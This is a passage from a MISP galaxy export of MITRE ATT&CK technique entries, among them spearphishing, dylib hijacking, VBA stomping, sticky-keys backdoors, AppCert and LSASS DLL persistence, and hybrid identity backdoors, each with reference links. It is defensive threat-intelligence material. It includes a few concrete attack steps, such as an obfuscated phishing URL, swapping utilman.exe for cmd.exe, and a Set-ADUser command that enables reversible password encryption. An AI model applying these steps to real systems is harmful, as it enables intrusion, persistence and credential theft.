Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: misp-galaxy:mitre-attack-pattern="Employee Names - T1589.003"

Table 6138. Table References

Links

https://attack.mitre.org/techniques/T1589/003

https://www.opm.gov/cybersecurity/cybersecurity-incidents/

Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, hxxp://google.com@1157586937.(Citation: Mandiant URL Obfuscation 2023)

Adversaries may also link to "web bugs" or "web beacons" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug)

Adversaries may also be able to spoof a complete website using what is known as a "browser-in-the-browser" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.(Citation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022)

Adversaries can use phishing kits such as EvilProxy and Evilginx2 to proxy the connection between the victim and the legitimate website. On a successful login, the victim is redirected to the legitimate website, while the adversary captures their session cookie (i.e., [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)) in addition to their username and password. This may enable the adversary to then bypass MFA via [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004).(Citation: Proofpoint Human Factor)

From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003"

Table 6139. Table References

Links

https://attack.mitre.org/techniques/T1598/003

https://csrc.nist.gov/glossary/term/web_bug

https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide

https://mrd0x.com/browser-in-the-browser-phishing-attack/

https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse

https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages

https://www.proofpoint.com/sites/default/files/threat-reports/pfpt-us-tr-human-factor-report.pdf

https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html

https://www.zscaler.com/blogs/security-research/fake-sites-stealing-steam-credentials

Dylib Hijacking - T1574.004

Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.

Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application’s address space allowing the malicious dylib to inherit the application’s privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)

The tag is: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1574.004"

Table 6140. Table References

Links

https://attack.mitre.org/techniques/T1574/004

https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html

https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py

https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py

https://malwareunicorn.org/workshops/macos_dylib_injection.html#5

https://objective-see.com/blog/blog_0x46.html

https://taomm.org/vol1/pdfs.html

https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf

https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf

LC_LOAD_DYLIB Addition - T1546.006

Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.

Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)

The tag is: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1546.006"

Table 6141. Table References

Links

https://attack.mitre.org/techniques/T1546/006

https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Spearphishing Voice - T1566.004

Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.

All forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on [User Execution](https://attack.mitre.org/techniques/T1204) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools ([Remote Access Software](https://attack.mitre.org/techniques/T1219)) onto their computer.(Citation: Unit42 Luna Moth)

Adversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621) in order to trick users into divulging MFA credentials or accepting authentication prompts.(Citation: Proofpoint Vishing)

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Voice - T1566.004"

Table 6142. Table References

Links

https://attack.mitre.org/techniques/T1566/004

https://blog.sygnia.co/luna-moth-false-subscription-scams

https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/

https://www.cisa.gov/uscert/ncas/alerts/aa23-025a

https://www.proofpoint.com/us/threat-reference/vishing

VBA Stomping - T1564.007

Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)

MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a <code>PerformanceCache</code> that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the <code>_VBA_PROJECT</code> stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)

An adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the <code>_VBA_PROJECT</code> stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)

The tag is: misp-galaxy:mitre-attack-pattern="VBA Stomping - T1564.007"

Table 6143. Table References

Links

https://attack.mitre.org/techniques/T1564/007

https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239

https://github.com/bontchev/pcodedmp

https://github.com/decalage2/oletools

https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278

https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/

https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html

Accessibility Features - T1546.008

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.

Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the shift key is pressed five times and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)

Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.

For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)

  • On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>

  • Magnifier: <code>C:\Windows\System32\Magnify.exe</code>

  • Narrator: <code>C:\Windows\System32\Narrator.exe</code>

  • Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>

  • App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>

The tag is: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008"

Table 6144. Table References

Links

http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/

https://attack.mitre.org/techniques/T1546/008

https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html

https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html

https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom

Web Services - T1584.006

Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user’s access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.

The tag is: misp-galaxy:mitre-attack-pattern="Web Services - T1584.006"

Table 6145. Table References

Links

https://attack.mitre.org/techniques/T1584/006

https://threatconnect.com/blog/infrastructure-research-hunting/

https://www.recordedfuture.com/turla-apt-infrastructure/

AppCert DLLs - T1546.009

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppCertDLLs</code> Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions <code>CreateProcess</code>, <code>CreateProcessAsUser</code>, <code>CreateProcessWithLoginW</code>, <code>CreateProcessWithTokenW</code>, or <code>WinExec</code>. (Citation: Elastic Process Injection July 2017)

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity.

The tag is: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1546.009"

Table 6146. Table References

Links

https://attack.mitre.org/techniques/T1546/009

https://forum.sysinternals.com/appcertdlls_topic12546.html

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Resource Forking - T1564.009

Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)

Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Resource Forking - T1564.009"

Table 6147. Table References

Links

http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553

https://attack.mitre.org/techniques/T1564/009

https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html

https://eclecticlight.co/2020/10/24/theres-more-to-files-than-data-extended-attributes/

https://flylib.com/books/en/4.395.1.192/1/

https://www.sentinelone.com/labs/resourceful-macos-malware-hides-in-named-fork/

LSASS Driver - T1547.008

Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)

Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.

The tag is: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1547.008"

Table 6148. Table References

Links

https://attack.mitre.org/techniques/T1547/008

https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://technet.microsoft.com/library/cc961760.aspx

https://technet.microsoft.com/library/dn408187.aspx

Shortcut Modification - T1547.009

Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.

Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.

Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176)) to persistently launch malware.

The tag is: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009"

Table 6149. Table References

Links

https://attack.mitre.org/techniques/T1547/009

https://www.elastic.co/guide/en/security/7.17/shortcut-file-written-or-modified-for-persistence.html#shortcut-file-written-or-modified-for-persistence

https://www.youtube.com/watch?v=nJ0UsyiUEqQ

Digital Certificates - T1588.004

Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.

Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.

Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let’s Encrypt FAQ)

After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.

The tag is: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1588.004"

Table 6150. Table References

Links

https://attack.mitre.org/techniques/T1588/004

https://letsencrypt.org/docs/faq/

https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/

https://www.recordedfuture.com/cobalt-strike-servers/

https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html

Spearphishing Voice - T1598.004

Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.

All forms of phishing are electronically delivered social engineering. In this scenario, adversaries use phone calls to elicit sensitive information from victims. Known as voice phishing (or "vishing"), these communications can be manually executed by adversaries, hired call centers, or even automated via robocalls. Voice phishers may spoof their phone number while also posing as a trusted entity, such as a business partner or technical support staff.(Citation: BOA Telephone Scams)

Victims may also receive phishing messages that direct them to call a phone number ("callback phishing") where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)

Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to tailor pretexts to be even more persuasive and believable for the victim.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Voice - T1598.004"

Table 6151. Table References

Links

https://attack.mitre.org/techniques/T1598/004

https://business.bofa.com/en-us/content/what-is-vishing.html

https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing

Password Managers - T1555.005

Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)

Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610) Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005"

Table 6152. Table References

Links

https://attack.mitre.org/techniques/T1555/005

https://github.com/GhostPack/KeeThief

https://nvd.nist.gov/vuln/detail/CVE-2019-3610

https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware

https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf

https://www.ise.io/casestudies/password-manager-hacking/

Reversible Encryption - T1556.005

An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)

If the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:

  1. Encrypted password (<code>G$RADIUSCHAP</code>) from the Active Directory user-structure <code>userParameters</code>

  2. 16 byte randomly-generated value (<code>G$RADIUSCHAPKEY</code>) also from <code>userParameters</code>

  3. Global LSA secret (<code>G$MSRADIUSCHAPKEY</code>)

  4. Static key hardcoded in the Remote Access Subauthentication DLL (<code>RASSFM.DLL</code>)

With this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.(Citation: how_pwd_rev_enc_1)(Citation: how_pwd_rev_enc_2)

An adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://attack.mitre.org/techniques/T1059/001) module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to "Windows Server 2008" or higher.(Citation: dump_pwd_dcsync) In PowerShell, an adversary may make associated changes to user settings using commands similar to <code>Set-ADUser -AllowReversiblePasswordEncryption $true</code>.

The tag is: misp-galaxy:mitre-attack-pattern="Reversible Encryption - T1556.005"

Table 6153. Table References

Links

http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html

http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html

https://adsecurity.org/?p=2053

https://attack.mitre.org/techniques/T1556/005

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption

Hybrid Identity - T1556.007

Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.

Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Azure AD includes three options for synchronizing identities between Active Directory and Azure AD(Citation: Azure AD Hybrid Identity):

  • Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Azure AD, allowing authentication to Azure AD to take place entirely in the cloud

  • Pass Through Authentication (PTA), in which Azure AD authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory

  • Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Azure AD

AD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges.

By modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the AzureADConnectAuthenticationAgentService process that authorizes all attempts to authenticate to Azure AD, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the Microsoft.IdentityServer.Servicehost configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb)

In some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Azure AD tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Azure AD environment as any user.(Citation: Mandiant Azure AD Backdoors)

The tag is: misp-galaxy:mitre-attack-pattern="Hybrid Identity - T1556.007"

Table 6154. Table References

Links

https://attack.mitre.org/techniques/T1556/007

https://blog.xpnsec.com/azuread-connect-for-redteam/

https://learn.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn

https://o365blog.com/post/on-prem_admin/

https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors

https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/

Scan Databases - T1596.005

Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)

Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).

The tag is: misp-galaxy:mitre-attack-pattern="Scan Databases - T1596.005"

Table 6155. Table References

Links

https://attack.mitre.org/techniques/T1596/005

https://shodan.io

Application Shimming - T1546.011

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)

Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS.

A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:

  • <code>%WINDIR%\AppPatch\sysmain.sdb</code> and

  • <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</code>

Custom databases are stored in:

  • <code>%WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom</code> and

  • <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom</code>

To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).

Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.

The tag is: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011"

Table 6156. Table References

Links

http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf

https://attack.mitre.org/techniques/T1546/011

https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Plist Modification - T1547.011

Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, <code>Info.plist</code>, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple’s Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description)

Adversaries can modify paths to executed binaries, add command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon user logon or system startup. Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library (dylib) by adding a dictionary containing the <code>DYLD_INSERT_LIBRARIES</code> key combined with a path to a malicious dylib under the <code>EnvironmentVariables</code> key in a plist file. Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space. Persistence can also be achieved by modifying the <code>LSEnvironment</code> key in the application’s <code>Info.plist</code> file.(Citation: wardle artofmalware volume1)

The tag is: misp-galaxy:mitre-attack-pattern="Plist Modification - T1547.011"

Table 6157. Table References

Links

https://attack.mitre.org/techniques/T1547/011

